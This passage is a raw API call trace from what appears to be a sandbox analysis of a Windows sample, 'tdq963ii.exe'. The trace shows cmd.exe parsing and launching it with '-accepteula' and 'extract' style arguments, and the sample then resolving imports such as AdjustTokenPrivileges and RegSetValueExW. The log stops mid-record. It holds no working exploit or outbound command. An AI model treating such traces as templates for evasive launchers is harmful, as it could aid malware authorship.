| out: lpLCData="Wed") returned 4 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0241.582] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0241.584] GetProcessHeap () returned 0x460000 [0241.584] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x4721e0 [0241.584] GetConsoleTitleW (in: lpConsoleTitle=0x4721e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0241.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0241.584] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0241.584] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0241.584] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0241.586] GetProcessHeap () returned 0x460000 [0241.586] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x474f08 [0241.586] GetProcessHeap () returned 0x460000 [0241.586] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474f08 | out: hHeap=0x460000) returned 1 [0241.587] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0241.587] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0241.587] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0241.587] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0241.587] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0241.587] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0241.587] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0241.587] GetProcessHeap () returned 0x460000 [0241.587] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x4746a8 [0241.587] GetProcessHeap () returned 0x460000 [0241.587] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x22) returned 0x4723f8 [0241.588] GetProcessHeap () returned 0x460000 [0241.588] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x56) returned 0x472428 [0241.589] GetConsoleTitleW (in: lpConsoleTitle=0x3af5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0241.591] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0241.591] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0241.592] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0241.593] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0241.594] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0241.595] GetProcessHeap () returned 0x460000 [0241.595] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x472488 [0241.595] GetProcessHeap () returned 0x460000 [0241.595] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x70) returned 0x4726a0 [0241.595] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0241.596] GetProcessHeap () returned 0x460000 [0241.596] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x472718 [0241.596] SetErrorMode (uMode=0x0) returned 0x0 [0241.596] SetErrorMode (uMode=0x1) returned 0x0 [0241.596] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x472720, lpFilePart=0x3af0c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3af0c0*="Desktop") returned 0x25 [0241.596] SetErrorMode (uMode=0x0) returned 0x1 [0241.596] GetProcessHeap () returned 0x460000 [0241.596] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x472718, Size=0x6e) returned 0x472718 [0241.596] GetProcessHeap () returned 0x460000 [0241.596] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x472718) returned 0x6e [0241.596] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0241.596] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0241.596] GetProcessHeap () returned 0x460000 [0241.596] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x472790 [0241.596] GetProcessHeap () returned 0x460000 [0241.596] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x4728b8 [0241.607] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0241.608] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x3aee5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3aee5c) returned 0x472a68 [0241.608] GetProcessHeap () returned 0x460000 [0241.608] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x14) returned 0x472aa8 [0241.608] FindClose (in: hFindFile=0x472a68 | out: hFindFile=0x472a68) returned 1 [0241.608] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0241.608] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0241.608] GetConsoleTitleW (in: lpConsoleTitle=0x3af334, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0241.901] InitializeProcThreadAttributeList (in: lpAttributeList=0x3af1bc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3af284 | out: lpAttributeList=0x3af1bc, lpSize=0x3af284) returned 1 [0241.901] UpdateProcThreadAttribute (in: lpAttributeList=0x3af1bc, dwFlags=0x0, Attribute=0x60001, lpValue=0x3af27c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3af1bc, lpPreviousValue=0x0) returned 1 [0241.901] GetStartupInfoW (in: lpStartupInfo=0x3af178 | out: lpStartupInfo=0x3af178*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0241.902] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0241.903] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3af218*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3af264 | out: lpCommandLine="tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner", lpProcessInformation=0x3af264*(hProcess=0x78, hThread=0x74, dwProcessId=0x3f8, dwThreadId=0x614)) returned 1 [0241.918] CloseHandle (hObject=0x74) returned 1 [0241.918] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0241.918] GetProcessHeap () returned 0x460000 [0241.918] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472d70 | out: hHeap=0x460000) returned 1 [0241.918] GetEnvironmentStringsW () returned 0x472d08* [0241.918] GetProcessHeap () returned 0x460000 [0241.918] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb82) returned 0x47af20 [0241.919] FreeEnvironmentStringsW (penv=0x472d08) returned 1 [0241.919] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0243.374] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3af158 | out: lpExitCode=0x3af158*=0x1) returned 1 [0243.374] CloseHandle (hObject=0x78) returned 1 [0243.374] _vsnwprintf (in: _Buffer=0x3af2a0, _BufferCount=0x13, _Format="%08X", _ArgList=0x3af164 | out: _Buffer="00000001") returned 8 [0243.374] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0243.374] GetProcessHeap () returned 0x460000 [0243.374] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47af20 | out: hHeap=0x460000) returned 1 [0243.374] GetEnvironmentStringsW () returned 0x472d08* [0243.374] GetProcessHeap () returned 0x460000 [0243.374] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb82) returned 0x47af20 [0243.374] FreeEnvironmentStringsW (penv=0x472d08) returned 1 [0243.374] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0243.374] GetProcessHeap () returned 0x460000 [0243.374] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47af20 | out: hHeap=0x460000) returned 1 [0243.374] GetEnvironmentStringsW () returned 0x472d08* [0243.375] GetProcessHeap () returned 0x460000 [0243.375] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb82) returned 0x47af20 [0243.375] FreeEnvironmentStringsW (penv=0x472d08) returned 1 [0243.375] GetProcessHeap () returned 0x460000 [0243.375] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4700c8 | out: hHeap=0x460000) returned 1 [0243.375] DeleteProcThreadAttributeList (in: lpAttributeList=0x3af1bc | out: lpAttributeList=0x3af1bc) [0243.375] _get_osfhandle (_FileHandle=1) returned 0x80 [0243.375] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0243.375] _get_osfhandle (_FileHandle=1) returned 0x80 [0243.375] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0243.375] _get_osfhandle (_FileHandle=0) returned 0x3 [0243.375] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0243.376] SetConsoleInputExeNameW () returned 0x1 [0243.376] GetConsoleOutputCP () returned 0x1b5 [0243.376] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0243.376] SetThreadUILanguage (LangId=0x0) returned 0x409 [0243.376] exit (_Code=1) Process: id = "263" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x28baf000" os_pid = "0x30c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "217" os_parent_pid = "0xad4" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 875 os_tid = 0x78c [0241.939] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0241.939] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0241.940] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0241.941] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0241.942] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0241.943] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0241.944] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0241.945] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0241.946] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0241.947] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0241.947] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0241.947] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0241.947] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0241.947] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0241.947] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0241.947] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0241.947] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0241.948] 